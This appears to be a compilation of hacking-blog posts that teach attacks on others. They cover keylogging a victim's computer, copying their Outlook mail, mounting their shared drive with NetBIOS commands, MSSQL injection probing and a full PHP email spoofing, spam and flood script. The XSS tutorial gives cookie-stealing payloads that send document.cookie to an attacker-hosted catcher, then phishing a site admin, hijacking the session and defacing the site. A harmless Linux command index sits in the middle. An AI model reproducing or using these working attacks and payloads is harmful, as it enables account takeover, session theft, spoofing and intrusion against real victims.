What is a keylogger - Keylogger explained

Today, with the advent of a program called Keylogger it’s just a cakewalk to hack an account. It doesn’t matter whether or not you have physical access to the victim’s computer. Using a keylogger is the easiest way to hack an account. Any one with a basic knowledge of computer can use the keylogger and within few hours you can hack any account.

What is a keylogger?
A keylogger, sometimes called a keystroke logger, keylogger, or system monitor, is a hardware device or small program that monitors each keystroke a user types on a specific computer’s keyboard. Keylogger is the easiest way to hack an account if you have physical access to victim’s computer. 



A keylogger program can be installed just in a few seconds and once installed you are only a step away from getting the victim’s password

Hack an account using keylogger:

NOTE:-YOU NEED TO HAVE ACCESS TO THE VICTIM'S COMPUTER TO DO THIS:


If you have physical access to the computer of the user that you are targeting, because it is a lot easier if you do. One option you have, that you will hear a lot if you ask this question, and anybody bothers to answer is to use a keylogger. A keylogger is an excellent option, and probably the easiest. There are a lot of keyloggers out there, ranging from hardware keyloggers, to software keyloggers. For this task, you won't need to buy a hardware keylogger, since the only advantage to a hardware one is that you can grab passwords that are given to access a certain local user on the operating system used. There are a lot of software keyloggers out there, and you can feel free to check out www.google.com to look at your options. I will go ahead and toss a couple of keyloggers out to try for those of you who seem allergic to search engines. 
 Once you have whatever keylogger you are going to use downloaded, just install it onto the computer you are wanting to monitor, and wait till next time they login to their email account. You will then have the password for the account. Another option you have if they use Outlook to access their email account, is to copy the *.dbx files for their Outlook account onto a floppy, and extract the emails at home (the dbx file stores the files stored in each Outlook folder on a given account, meaning the received and sent emails). When you are on the computer of the user you are targeting, look in

C:\Windows\ApplicationData\Identities\{ACblahblahblah}\Microsoft\ OutlookExpress\ and copy all the .dbx files onto a floppy. Then when you take the .dbx files back to your house, use DBXtract to extract the messages from these files. 

Which are the best keylogger now a days?

I have made a detailed post on this topic in my post Which spyware keylogger software to choose,You must prefer reading it

RAT:(Remote administration tool)
Another option you have if you have physical access is to execute a RAT (Remote Administration Tool, you may know these programs as trojans) server on the computer. Of course, you do not have to have physical access to go this route, but it helps. What you must understand is that these tools are known threats, and the popular ones are quickly detected by antivirus software, and thusly taken care of. Even ISPs block incoming/outgoing traffic from the most popular ports used by these programs.

Read More

Hacking into another persons computer

Step 1 
First of all,get a good IP scanner angry ip scanner is a good one you can get it here:
Angry ip scanner Download

Step 2
Now click on start and then goto run and then type there "CMD" and press ok

 This is what you see:
c:\windows>

Now this is what you have to do ---->>> 

Replace 255.255.255.255 with the victims IP address., i have wrote another article on How to trace
an ip address of the victims computer

c:\windows>nbtstat -a 255.255.255.255

If you see this your in NetBIOS Remote Machine Name Table

Name Type Status ---------------------------------------------------------------
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = xx-xx-xx-xx-xx-xx 
---------------------------------------------------------------

If you don't get the number <20>. 
The victim disabled the File And Printer Sharing, find  another victim.

Step 3:

Type down:

c:\windows>net view \\255.255.255.255 

If the output is like this:

Shared resources at \\255.255.255.255
ComputerNameGoesHere 

Sharename Type Used as Comment

------------------------------------------------------------
CDISK Disk xxxxx xxxxx

The command completed successfully.

"DISK" shows that the victim is sharing a Disk named as CDISK

Step 4 

you can replace x: by any letter you want but not the letter of your own drive.

CDISK is the name of the shared harddrive. 

Now type:
c:\windows>net use x: \\255.255.255.255\CDISK

If the command is successful you are a small time hacker.

Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive X:.


Note to newbies: This hack will only work if you have the ip of someone on your network. It will not work if the ip of the person you want to "hack" is not on your network. 

Tip: If you can only access your targets shared folder put a batch file in their shared folder with the command C=C if they open it,it will share their hardrive. 

Read More

How To Hack Website By My-Sql Injection

There are various types of sql injection for MICROSOFT here as follows:

1)ODBC Error Message Attack with "CONVERT"
2)ODBC Error Message Attack with "HAVING" and "GROUP BY"
3)MSSQL Injection with UNION Attack
4)MSSQL Injection in Web Services (SOAP Injection)
5)MSSQL Blind SQL Injection Attack

Here m going to explain the first one "sql with convert"

STEP 1:

First we need to find a vulnerable site.

By adding a single quote (') double quote (";") or a semicolon  to the field under test.

eg:
http://www.example.com/news.asp?id=10'
http://www.example.com/news.asp?id=10;

It's vulnerable in SQL injection,If the output shows some error like this:

[HTTP Response]------------------------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the
character string ''.
/news.asp, line 52
[End HTTP Response]-------------------------------------------------------------------------

Also error could be something like below

Microsoft OLE DB Provider for SQL Server error '80040e14 '
Open quotation mark after the character string ") AND (Volgorde> 0) ORDER BY Volgorde '.
..../ main_rub.asp, line 4

If the errors like above are shown then site could be vulnerable in SQL

Also you can find vulnerable site from google dork.

eg

inurl:age.asp?id=
inurl:index.asp?sid=
u can see sql dorks in my old posts.
STEP 2:

Now we got our vulnerable website.
CONVERT command is used to convert between two data types and when the specific
data cannot convert to another type the error will be returned.

Read More

Linux Base Command Linux INDEX

 Basic BASH commands....

A

alias Create an alias
apropos Search Help manual pages (man -k)
apt-get Search for and install software packages (Debian)
aspell Spell Checker
awk Find and Replace text, database sort/validate/index

B
bash GNU Bourne-Again SHell
bc Arbitrary precision calculator language
bg Send to background
break Exit from a loop
builtin Run a shell builtin
bzip2 Compress or decompress named file(s)

C
cal Display a calendar
case Conditionally perform a command
cat Display the contents of a file
cd Change Directory
cfdisk Partition table manipulator for Linux
chgrp Change group ownership
chmod Change access permissions
chown Change file owner and group
chroot Run a command with a different root directory
chkconfig System services (runlevel)
cksum Print CRC checksum and byte counts
clear Clear terminal screen
cmp Compare two files
comm Compare two sorted files line by line
command Run a command – ignoring shell functions
continue Resume the next iteration of a loop
cp Copy one or more files to another location
cron Daemon to execute scheduled commands
crontab Schedule a command to run at a later time
csplit Split a file into context-determined pieces
cut Divide a file into several parts

D
date Display or change the date & time
dc Desk Calculator
dd Convert and copy a file, write disk headers, boot records
ddrescue Data recovery tool
declare Declare variables and give them attributes
df Display free disk space
diff Display the differences between two files
diff3 Show differences among three files
dig DNS lookup
dir Briefly list directory contents
dircolors Colour setup for `ls’
dirname Convert a full pathname to just a path
dirs Display list of remembered directories
dmesg Print kernel & driver messages
du Estimate file space usage

E
echo Display message on screen
egrep Search file(s) for lines that match an extended expression
eject Eject removable media
enable Enable and disable builtin shell commands
env Environment variables
ethtool Ethernet card settings
eval Evaluate several commands/arguments exec Execute a command
exit Exit the shell
expect Automate arbitrary applications accessed over a terminal
expand Convert tabs to spaces
export Set an environment variable
expr Evaluate expressions

F
false Do nothing, unsuccessfully
fdformat Low-level format a floppy disk
fdisk Partition table manipulator for Linux
fg Send job to foreground
fgrep Search file(s) for lines that match a fixed string
file Determine file type
find Search for files that meet a desired criteria
fmt Reformat paragraph text
fold Wrap text to fit a specified width.
for Expand words, and execute commands
format Format disks or tapes
free Display memory usage
fsck File system consistency check and repair
ftp File Transfer Protocol
function Define Function Macros
fuser Identify/kill the process that is accessing a file

G
gawk Find and Replace text within file(s)
getopts Parse positional parameters
grep Search file(s) for lines that match a given pattern
groups Print group names a user is in
gzip Compress or decompress named file(s)

H
hash Remember the full pathname of a name argument
head Output the first part of file(s)
history Command History
hostname Print or set system name

I
id Print user and group id’s
if Conditionally perform a command
ifconfig Configure a network interface
ifdown Stop a network interface
ifup Start a network interface up
import Capture an X server screen and save the image to file
install Copy files and set attributes

J
join Join lines on a common field

K
kill Stop a process from running
killall Kill processes by name

L
less Display output one screen at a time
let Perform arithmetic on shell variables
ln Make links between files
local Create variables
locate Find files
logname Print current login name
logout Exit a login shell
look Display lines beginning with a given string
lpc Line printer control program
lpr Off line print
lprint Print a file
lprintd Abort a print job
lprintq List the print queue
lprm Remove jobs from the print queue
ls List information about file(s)
lsof List open files

M
make Recompile a group of programs
man Help manual
mkdir Create new folder(s)
mkfifo Make FIFOs (named pipes)
mkisofs Create an hybrid ISO9660/JOLIET/HFS filesystem
mknod Make block or character special files
more Display output one screen at a time
mount Mount a file system
mtools Manipulate MS-DOS files
mv Move or rename files or directories
mmv Mass Move and rename (files)

N
netstat Networking information
nice Set the priority of a command or job
nl Number lines and write files
nohup Run a command immune to hangups
nslookup Query Internet name servers interactively

O
open Open a file in its default application
op Operator access

P
passwd Modify a user password
paste Merge lines of files
pathchk Check file name portability
ping Test a network connection
pkill Stop processes from running
popd Restore the previous value of the current directory
pr Prepare files for printing
printcap Printer capability database
printenv Print environment variables
printf Format and print data
ps Process status
pushd Save and then change the current directory
pwd Print Working Directory

Q
quota Display disk usage and limits
quotacheck Scan a file system for disk usage
quotactl Set disk quotas

R
ram ram disk device
rcp Copy files between two machines
read read a line from standard input
readonly Mark variables/functions as readonly
reboot Reboot the system
renice Alter priority of running processes
remsync Synchronize remote files via email
return Exit a shell function
rev Reverse lines of a file
rm Remove files
rmdir Remove folder(s)
rsync Remote file copy (Synchronize file trees)

S
screen Multiplex terminal, run remote shells via ssh
scp Secure copy (remote file copy)
sdiff Merge two files interactively
sed Stream Editor
select Accept keyboard input
seq Print numeric sequences
set Manipulate shell variables and functions
sftp Secure File Transfer Program
shift Shift positional parameters
shopt Shell Options
shutdown Shutdown or restart linux
sleep Delay for a specified time
slocate Find files
sort Sort text files
source Run commands from a file `.’
split Split a file into fixed-size pieces
ssh Secure Shell client (remote login program)
strace Trace system calls and signals
su Substitute user identity
sudo Execute a command as another user
sum Print a checksum for a file
symlink Make a new name for a file
sync Synchronize data on disk with memory

T
tail Output the last part of files
tar Tape ARchiver
tee Redirect output to multiple files
test Evaluate a conditional expression
time Measure Program running time
times User and system times
touch Change file timestamps
top List processes running on the system
traceroute Trace Route to Host
trap Run a command when a signal is set(bourne)
tr Translate, squeeze, and/or delete characters
true Do nothing, successfully
tsort Topological sort
tty Print filename of terminal on stdin
type Describe a command

U
ulimit Limit user resources
umask Users file creation mask
umount Unmount a device
unalias Remove an alias
uname Print system information
unexpand Convert spaces to tabs
uniq Uniquify files
units Convert units from one scale to another
unset Remove variable or function names
unshar Unpack shell archive scripts
until Execute commands (until error)
useradd Create new user account
usermod Modify user account
users List users currently logged in
uuencode Encode a binary file
uudecode Decode a file created by uuencode

V
v Verbosely list directory contents (`ls -l -b’)
vdir Verbosely list directory contents (`ls -l -b’)
vi Text Editor
vmstat Report virtual memory statistics

W
watch Execute/display a program periodically
wc Print byte, word, and line counts
whereis Report all known instances of a command
which Locate a program file in the user’s path.
while Execute commands
who Print all usernames currently logged in
whoami Print the current user id and name (`id -un’)
Wget Retrieve web pages or files via HTTP, HTTPS or FTP
write Send a message to another user

X
xargs Execute utility, passing constructed argument list(s)
yes Print a string until interrupted
. Run a command script in the current shell

Read More

MAKE YOUR OWN EMAIL SPOOFING SERVICE

1. First of all you need to find a free hosting service that supports PHP and SendMail. Here is one that works perfect, and without ads: x10hosting.com. Create an account there.

2. Now open notepad and paste the PHP code written at bottom of the page.

3. Save it everywhere u want as mail.php, then upload it in your host you created (ripway.com) via FTP.

4. Now we are done. Just go at ripway.com.yourname/mail.php, and start sending your fake emails.

Why sending anonymous emails is important:
Anonymously report sensitive information to the media
Send crime tips to law enforcement agencies anonymously
Report wrongdoing or theft at the workplace
Voice concerns to school principals anonymously
Report child or any other abuse
Initiate an anonymous chat discussion
Share suspicions regarding a friend or loved one

The PHP CODE :

<?
/*
(C) NOmeR1
*/
?>
<title>Sender Anonym Email :: FLoodeR :: SpameR</title>
<?
//
error_reporting (0);
if(!set_time_limit(0)) {
$limit = false;
} else {
set_time_limit(0);
ignore_user_abort(1);
$limit = true;
}

$log = 'log.txt'; // Log file

ini_set('max_execution_time', '0');

?>
set_time_limit(0) = <?if($limit)echo('<font color=Green>On</font>');else
echo('<font color=Red>Off</font> (Working time is limited with the current settings of the server)');?><br>
<?

$ip = getenv('REMOTE_ADDR');
if($_GET['mail'] == '1' || $_GET['mail'] == '2' || $_GET['mail'] == '3')
{

$_POST['to'] = stripslashes($_POST['to']);
$_POST['msg'] = stripslashes($_POST['msg']);
$_POST['from'] = stripslashes($_POST['from']);
$_POST['subject'] = stripslashes($_POST['subject']);

if($_POST['to'] && $_POST['msg'] && $_POST['from'] && $_POST['tipe'])
{
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/".$_POST['tipe']."; charset=windows-1251\r\n";
$headers .= "From: ".$_POST['from']."\n";
if($_GET['mail'] == '1')
{
mail($_POST['to'], $_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message');
}
elseif($_GET['mail'] == '2')
{
$_POST['to'] = explode("\n",$_POST['to']);
foreach($_POST['to'] as $poluchatels)
{
mail($poluchatels, $_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message');
}
}
elseif($_GET['mail'] == '3')
{
if(preg_match('/[0-9]+/',$_POST['kol']))
{
for($i=0;$i<$_POST['kol'];$i++)
{
mail($_POST['to'], $_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message');
sleep(1);
}
}
else
{
echo('Incorrect (or not entered) number of messages');
}
}
$f = fopen($log,'a');
fwrite($f,'Message sent &'.$_POST['msg'].'& with subject "'.$_POST['subject'].'" for "'.$_POST['to'].'" from IP - "'.$ip."\"\r\n");
fclose($f);
echo('<center><b><font color="green">Message succesfully sent</font></b></center>');
}
else
{
?>
<form style="width:350px" method='post'>
<?
if($_GET['mail'] == '1' || $_GET['mail'] == '3')
{
echo("Receiver &nbsp;<input type='text'name='to'><br>");
}
?>
Sender <input type='text' name='from'><br>
Subject &nbsp;<input type='text' name='subject'><br>
<?
if($_GET['mail'] == '3')
{
echo("Amount of messages <input type='text' name='kol'><br>");
}
?>
<br>
htm -> <input type='radio' checked='checked' tabindex='1' name='tipe' value='html'> :: <input type='radio' name='tipe' value='plain'><- text<br>
<?
if($_GET['mail'] == '2')
{
echo("Receivers<br><textarea name='to' rows='10' cols='30'>admin@fbi.org
admin@cia.org
admin@whitehouse.org</textarea>");
}
?>
<br>Message<br>
<textarea name='msg' rows='10' cols='30'></textarea><br><br><input type='submit'>
</form>
<?
}
} else {
?><br>
<a href='<?=$_SERVER['PHP_SELF']?>?mail=1'>Send simple message</a><br>
<a href='<?=$_SERVER['PHP_SELF']?>?mail=2'>Spam</a><br>
<a href='<?=$_SERVER['PHP_SELF']?>?mail=3'>Flood</a><br>
<?
}

Read More

XSS Tutorial

Hi XSS is in 2 ways, Persistent and Non-Persistent type.

For XSS we will use something called a cookie catcher.
Question will be that why we would need someone else's cookie?
The answer is that we can change our browser's cookies to login as them!!! So lets call it Session Hijacking...

First go to a free hosting site like http://www.110mb.com or other php hosting sites and register there. Then download this cookie catcher and upload it.

Cookie Catcher: DOWNLOAD

What does the cookie catcher do?
It grabs the user's:

• Cookies
• IP
• Referral link which what page it got to that link
• Time and Date

Get Vulnerable sites:

Ok first we need sites that are vulnerable to XSS so it will work on them.
To test it we will need to add a code after the link.
I will use this site that many of you probably saw it before.
DOWNLOAD

Now for testing if a site is vuln or not you can add these codes:

Code:

"><script>alert(document.cookie)</script>

Code:

'><script>alert(document.cookie)</script>

Code:

"><script>alert("Test")</script>

Code:

'><script>alert("Test")</script>

Or a new one which i found out myself which you can inject HTML:

Code:

"><body bgcolor="FF0000"></body>

Code:

"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe>

Then if we see a java script popup like this:

Or if you used my testing and you saw the page's background go black or a page of google opens in that site means its vulnerable to XSS attacks.

In the end, if your site is http://www.example.com the link to test it would be: http://www.example.com/index.php?id="><script>alert(document.cookie)</script>


Persistent XSS:

In this method we will grab the victim's cookies with no suspection and completely stealth.
Now assume we have a forum which has HTML enabled or a site which has a comment page which is vulnerable to XSS.
Ok now lets go to this site: LINK
Now test and see if the XSS vulnerable test's work on it.
It does!!! And your getting one of the vulnerability's symptoms. So now lets try to grab it's cookies. If there is a box to type and submit it add this:

Code:

<script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>

and submit that post in the forum or the comment box also its good to add something before adding the code like: hey i got a problem logging in???
so they wont suspect you...

Refresh the page, now go to the newly created page, in the same directory as you saved your cookie catcher .php search for cookies.html which is a new file that show you the cookies. like if your cookie catcher link would be:
http://www.example.com/cookie catcher.php
the container of the cookies would be:
http://www.example.com/cookies.html

Now visit cookies.html and you would see the session of that cookie! 
PS: the site i used doesn't support cookies so you can use: LINK for cookie supporting.

Now there is another way for a cookie grabbing drive by, add this code and post it:

Code:

<iframe frameborder=0 height=0 width=0 src=javascript:void(document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie)</iframe>

Then post it in the forum or the comment box.
Now this will open a iframe in the page which will allow you to have the same page in that website. If you don't know about iframes make a new html file in your computer and just do a 

<iframe src="www.google.com"></iframe> and you will understand iframes more...

ofc the site Needs to have cookies supported! a blank javascript means you need to go to another site.


Non-Persistent XSS:

Ok in this method we will make the victim admin go to our link. First we will pick a XSS vuln site. For this method we will need a search.php which that page is vuln to XSS and has cookies in that page. In the vuln search.php in the textbox for the word to search for type:

Code:

<script>alert(document.cookie)</script>

and click the search button. If you see a javascript popup means its vuln to Non-Persistent XSS attack. Ok now we will do something similar.
I will use this link for this method: http://adf.ly/TeZV
Now in front of the search.php?search= add this:

Code:

"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>

Now go to LINK and shrink the whole page's link. Try to find a site administrator's E-mail in that vuln website and send a Fake Mail from a online fake mailer like this one: 
FAKE MAILER

Now in the body just tell something fake like: Hey i found a huge bug in your website! and give him the shrinked link of the search.php which you added the code in front of it to him. so the Tinyurl will mask it and once he goes to the link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookies catcher. No matter what he does and changes his password you can still login as him.


Session Hijacking:

Ok now you have the admin's cookies either way, so we need to edit our own browser's cookies. First go to that page's admin login or its main page and delete ALL of your cookies from that page. Now go in your cookies.html page and copy everything in front of the Cookie: in a note opened Notepad. The ; separates cookies from each other so first copy the code before the ; .
Now go in that vuln website and clear the link. instead add this:

Code:

Javascript:void(document.cookie="")

or for an example:

Code:

Javascript:void(document.cookie="__utma=255621336.1130089386.1295743598.1305934653.1305950205.86")

Then visit the link. Do this with all of the cookies and refresh the page. And wham!!! your logged in as administrator.
So now go in your admin panel and upload your deface page.

Read More